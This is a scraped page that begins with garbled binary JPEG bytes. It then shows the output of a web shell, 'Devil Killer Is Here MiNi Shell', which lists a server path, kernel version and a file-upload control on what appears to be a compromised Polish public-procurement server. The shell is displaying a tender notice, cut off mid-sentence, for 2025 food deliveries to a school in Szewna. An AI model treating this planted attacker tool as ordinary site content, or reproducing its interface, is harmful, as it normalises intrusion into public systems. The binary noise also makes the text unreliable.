JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241212/0065055001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup oraz dostawa artykułów żywnościowych dla Zespołu Szkół Publicznych w Szewnie ul. M. Langiewicza 3 w okresie od 1 stycznia 2025 r. do 31 grudnia 2025 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Publicznych w Szewnie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 260648484</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">M. Langiewicza 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szewna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">412656070</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zspszewna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">szewnasp.hekko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup oraz dostawa artykułów żywnościowych dla Zespołu Szkół Publicznych w Szewnie ul. M. Langiewicza 3 w okresie od 1 stycznia 2025 r. do 31 grudnia 2025 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cf66456f-2e7a-428d-9c1b-8d2c9d82d9c5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00650550</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-cf66456f-2e7a-428d-9c1b-8d2c9d82d9c5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy pomocy<br/>Platformy e-zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>Postępowanie można wyszukać podając identyfikator postępowania: ocds-148610-cf66456f-2e7a-428d-9c1b-8d2c9d82d9c5</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja pomiędzy Zamawiającym<br/>a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się<br/>elektronicznie za pośrednictwem na ePUAP lub za pomocą poczty elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wymagane informacje zamieszczone są w rozdziale XXII SWZ- Ochrona danych<br/>osobowych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa mięsa, produktów mięsnych, wędlin i ryb wędzonych w ilościach określonych<br/>w Formularzu asortymentowo-cenowym stanowiącym Załącznik Nr 4.1 do SWZ.<br/>Zamówienie zostanie wykonane w okresie od dnia 1 stycznia 2025 r. do dnia 31 grudnia 2025 r.<br/>Wymagany termin wykonania przedmiotu zamówienia:<br/>– 2-3 razy w tygodniu na godz.7.00,<br/>Miejsce dostarczenia przedmiotu zamówienia: Zespół Szkół Publicznych w Szewnie, ul. M. Langiewicza 3, 27-400 Ostrowiec Św.<br/>Przedmiotem zamówienia jest zakup i dostawa mięsa, produktów mięsnych, wędlin i ryb wędzonych<br/>w Formularzu asortymentowo-cenowym stanowiącym Załącznik Nr 4.1 do SWZ.<br/>Wymagania dodatkowe dotyczące asortymentu:<br/>a) powinny cechować się wysokimi walorami smakowymi,<br/>b) dostarczane produkty muszą być I gatunku, świeże z odpowiednim terminem przydatności do spożycia, zgodne zobowiązującymi normami,<br/>c) bez uszkodzeń mechanicznych i zmian biologicznych,<br/> <br/>d) bez objawów chorób i pleśni.<br/>Pierwsza klasa jakości mięsa oznacza: mięso chude, nieściągnięte o wartości tłuszczu 7%, bez tłuszczu zewnętrznego, nie<br/>zawierające skórek, chrząstek, ścięgien niekonsumpcyjnych i powięzi.<br/>Produkty powinny być w opakowaniach dopuszczonych do kontaktu z żywnością, powinny zabezpieczać produkt przed<br/>uszkodzeniem i zanieczyszczeniem, czyste bez obcych zapachów, zabrudzeń i pleśni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15110000-2 - Mięso</p> <p class="mb-0">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</p> <p class="mb-0">15131130-5 - Wędliny</p> <p class="mb-0">15234000-7 - Ryby wędzone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Wskazane w Formularzach asortymentowo – cenowych dla poszczególnych Części ilości przedmiotu zamówienia są<br/>wielkościami szacunkowymi (wyliczonymi na podstawie m.in. zużycia produktów w 2024 roku oraz iloczynu gramatur i ilości<br/>dzieci korzystających z posiłków) i w czasie obowiązywania umowy mogą ulec zmianie, co oznacza, że nie stanowią<br/>ostatecznego wymiaru zamówienia w wyniku, czego nie mogą być podstawą do zgłoszenia roszczeń z tytułu nie<br/>zrealizowanych dostaw lub podstawą do odmowy ich realizacji. Zamówienia będą wynikać z bieżącego zapotrzebowania<br/>Zamawiającego wynikającego z ilości dzieci korzystających z posiłków , których Zamawiający nie jest w stanie określić na<br/>etapie przeprowadzania postępowania. W związku z czym Zamawiający zastrzega możliwość realizacji przedmiotu umowy<br/>do 80% jej wartości. Zamawiający zobowiązuje się do minimalnej realizacji zamówienia na poziomie nie mniejszym niż 80 %<br/>łącznej wartości przedmiotu zamówienia. Zgodnie z art. 441 Ustawy pzp Zamawiający zastrzega sobie prawo opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona na podstawie poniżej wskazanych kryteriów oceny ofert i ich<br/>wag punktowych</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość dostawcy od Zespołu Szkół Publicznych w Szewnie, ul. M. Langiewicza 3</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie zostanie wykonane w okresie od dnia 1 stycznia 2025 r. do dnia 31 grudnia 2025 r.<br/>Wymagany termin wykonania przedmiotu zamówienia:<br/>– codziennie w godz. 6.00 - 7.00,<br/>Miejsce dostarczenia przedmiotu zamówienia: Zespół Szkół Publicznych w Szewnie ul. M Langiewicza 3.<br/>Przedmiotem zamówienia jest zakup i dostawa pieczywa, świeżych wyrobów piekarskich i ciastkarskich w ilościach<br/>określonych w Formularzu asortymentowo-cenowym stanowiącym Załącznik Nr 4.2 do SWZ.<br/><br/>Wymagania dodatkowe dotyczące asortymentu:<br/>a) powinny cechować się wysokimi walorami smakowymi,<br/>b) dostarczane produkty muszą być I gatunku, świeże z odpowiednim terminem przydatności do spożycia, zgodne z<br/>obowiązującymi normami,<br/>c) bez uszkodzeń mechanicznych i zmian biologicznych,<br/>d) bez objawów chorób i pleśni.<br/>Produkty powinny być w opakowaniach dopuszczonych do kontaktu z żywnością, powinny zabezpieczać produkt przed<br/>uszkodzeniem i zanieczyszczeniem, czyste bez obcych zapachów, zabrudzeń i pleśni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15811000-6 - Pieczywo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Wskazane w Formularzach asortymentowo – cenowych dla poszczególnych Części ilości przedmiotu zamówienia są<br/>wielkościami szacunkowymi (wyliczonymi na podstawie m.in. zużycia produktów w 2024 roku oraz iloczynu gramatur i ilości<br/>dzieci korzystających z posiłków) i w czasie obowiązywania umowy mogą ulec zmianie, co oznacza, że nie stanowią<br/>ostatecznego wymiaru zamówienia w wyniku, czego nie mogą być podstawą do zgłoszenia roszczeń z tytułu nie<br/>zrealizowanych dostaw lub podstawą do odmowy ich realizacji. Zamówienia będą wynikać z bieżącego zapotrzebowania<br/>Zamawiającego wynikającego z ilości dzieci korzystających z posiłków, których Zamawiający nie jest w stanie określić na<br/>etapie przeprowadzania postępowania. W związku z czym Zamawiający zastrzega możliwość realizacji przedmiotu umowy<br/>do 80% jej wartości. Zamawiający zobowiązuje się do minimalnej realizacji zamówienia na poziomie nie mniejszym niż 80 %<br/>łącznej wartości przedmiotu zamówienia. Zgodnie z art. 441 Ustawy pzp Zamawiający zastrzega sobie prawo opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość dostawcy od Zespołu Szkół Publicznych w Szewnie, ul. M. Langiewicza 3</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa produktów mleczarskich w ilościach określonych w Formularzu<br/>asortymentowo-cenowym stanowiącym Załącznik Nr 4.3 do SWZ.<br/>Wymagania dodatkowe dotyczące asortymentu:<br/>a) powinny cechować się wysokimi walorami smakowymi,<br/>b) dostarczane produkty muszą być I gatunku, świeże z odpowiednim terminem przydatności do spożycia, zgodne z<br/>obowiązującymi normami,<br/>c) bez uszkodzeń mechanicznych i zmian biologicznych,<br/>d) bez objawów chorób i pleśni. <br/>Produkty powinny być w opakowaniach dopuszczonych do kontaktu z żywnością, powinny zabezpieczać produkt przed<br/>uszkodzeniem i zanieczyszczeniem, czyste bez obcych zapachów, zabrudzeń i pleśni.<br/>Zamówienie zostanie wykonane w okresie od dnia 1 stycznia 2025 r. do dnia 31 grudnia 2025 r.<br/>Wymagany termin wykonania przedmiotu zamówienia:<br/>Część 3 Artykuły mleczarskie – 2-3 razy w tygodniu na godz. 7.00,<br/>Miejsce dostarczenia przedmiotu zamówienia: Zespół Szkół Publicznych<br/>w Szewnie ul. M Langiewicza 3. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Wskazane w Formularzach asortymentowo – cenowych dla poszczególnych Części ilości przedmiotu zamówienia są<br/>wielkościami szacunkowymi (wyliczonymi na podstawie m.in. zużycia produktów w 2024 roku oraz iloczynu gramatur i ilości<br/>dzieci korzystających z posiłków) i w czasie obowiązywania umowy mogą ulec zmianie, co oznacza, że nie stanowią<br/>ostatecznego wymiaru zamówienia w wyniku, czego nie mogą być podstawą do zgłoszenia roszczeń z tytułu nie<br/>zrealizowanych dostaw lub podstawą do odmowy ich realizacji. Zamówienia będą wynikać z bieżącego zapotrzebowania<br/>Zamawiającego wynikającego z ilości dzieci korzystających z posiłków , których Zamawiający nie jest w stanie określić na<br/>etapie przeprowadzania postępowania. W związku z czym Zamawiający zastrzega możliwość realizacji przedmiotu umowy<br/>do 80% jej wartości. Zamawiający zobowiązuje się do minimalnej realizacji zamówienia na poziomie nie mniejszym niż 80 %<br/>łącznej wartości przedmiotu zamówienia. Zgodnie z art. 441 Ustawy pzp Zamawiający zastrzega sobie prawo opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona na podstawie poniżej wskazanych kryteriów oceny ofert i ich wag punktowych</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość dostawcy od Zespołu Szkół Publicznych w Szewnie, ul. M. Langiewicza 3</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa jaj, produktów zbożowych, przecierów pomidorowych, ryb przetworzonych i<br/>konserwowanych, oleju, przetworzonych owoców i warzyw, cukru i produktów pokrewnych, herbaty, wody mineralnej w<br/>ilościach określonych w Formularzu asortymentowo-cenowym stanowiącym Załącznik Nr 4.4 do SWZ.<br/>Wymagania dodatkowe dotyczące asortymentu:<br/>a) powinny cechować się wysokimi walorami smakowymi,<br/>b) dostarczane produkty muszą być I gatunku, świeże z odpowiednim terminem przydatności do spożycia, zgodne z<br/>obowiązującymi normami,<br/>c) bez uszkodzeń mechanicznych i zmian biologicznych,<br/>d) bez objawów chorób i pleśni.<br/>W przypadku artykułów ogólnospożywczych wymagany termin przydatności do spożycia produktu musi wynosić co najmniej<br/>2 miesiące licząc od dnia dostarczenia produktu do Zamawiającego przez Wykonawcę. Produkty powinny być w<br/>opakowaniach dopuszczonych do kontaktu z żywnością, powinny zabezpieczać produkt przed uszkodzeniem i<br/>zanieczyszczeniem, czyste bez obcych zapachów, zabrudzeń i pleśni.<br/>Przy dostawie jaj wymagany jest każdorazowo przy dostawie dokument aktualny na dzień dostawy potwierdzający badanie<br/>na Salmonelle oraz Handlowy Dokument Identyfikacyjny chyba, że faktura jest jednocześnie dokumentem HDI.<br/>Zamówienie zostanie wykonane w okresie od dnia 1 stycznia 2025 r. do dnia 31 grudnia 2025 r.<br/>Wymagany termin wykonania przedmiotu zamówienia dla Część 4 – 1 -2 raz w tygodniu w godz. 6.00-13.00,<br/>Miejsce dostarczenia przedmiotu zamówienia: Zespół Szkół Publicznych w Szewnie ul. M Langiewicza 3 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142500-3 - Jaja</p> <p class="mb-0">15613300-1 - Produkty zbożowe</p> <p class="mb-0">15331425-2 - Przecier pomidorowy</p> <p class="mb-0">15200000-0 - Ryby przetworzone i konserwowane</p> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</p> <p class="mb-0">15330000-0 - Przetworzone owoce i warzywa</p> <p class="mb-0">15830000-5 - Cukier i produkty pokrewne</p> <p class="mb-0">15863000-5 - Herbata</p> <p class="mb-0">15981000-8 - Wody mineralne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Wskazane w Formularzach asortymentowo – cenowych dla poszczególnych Części ilości przedmiotu zamówienia są<br/>wielkościami szacunkowymi (wyliczonymi na podstawie m.in. zużycia produktów w 2024 roku oraz iloczynu gramatur i ilości<br/>dzieci korzystających z posiłków) i w czasie obowiązywania umowy mogą ulec zmianie, co oznacza, że nie stanowią<br/>ostatecznego wymiaru zamówienia w wyniku, czego nie mogą być podstawą do zgłoszenia roszczeń z tytułu nie<br/>zrealizowanych dostaw lub podstawą do odmowy ich realizacji. Zamówienia będą wynikać z bieżącego zapotrzebowania<br/>Zamawiającego wynikającego z 